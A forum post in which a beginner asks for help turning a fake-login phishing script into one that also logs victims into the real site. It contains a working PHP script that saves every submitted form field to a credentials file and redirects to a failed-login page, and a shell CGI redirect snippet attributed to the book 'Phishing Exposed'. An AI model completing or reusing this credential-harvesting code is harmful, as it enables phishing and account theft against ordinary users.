Hello everyone, first of all just wanted to introduce myself, and hope that I can learn from this forum and also contribute to the sharing of knowledge =)
I am trying to learn more about phishers and some of the techniques they use nowadays. And because my PHP is really bad (I'm trying to work on it =P) I was wondering if you could help me with creating a script that not only logs an imput text, but also uses that text as a login in the real page.
After some research I learned about the basic fake login script:
<?php
header ('Location: http://failedloginpage');
$handle = fopen("credentials.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>
Where after loging in you are redirected to the real page with a failed login.
After some more research I found a book called Phishing Exposed where there was this code that allowed to record credentials and use them to send POST to the real website with the user credentials.
#!/bin/sh
PATH=/bin:/usr/bin:/usr/local/bin
RSERVER=bank.securescience.net/bank
URI='echo "${REQUEST_URI}" | sed -e 's@.*/cgi/@/cgi/@''
# Give CGI header and start web page
echo "Status: 301 Moved
Content-Type: text/html
Location: http://${RSERVER}${URI}
<html>
<body>
This page has moved to
<a href=\"http://${RSERVER}${URI}\">http://${RSERVER}${REQUEST_URI}</a>
</body>
</html>"
I know this is probably pretty simple, but I am a begginer regarding scripting, so can you please help me make sense of this? What would I need to implement in the first script to be able to do the redirecting?
Thank you =)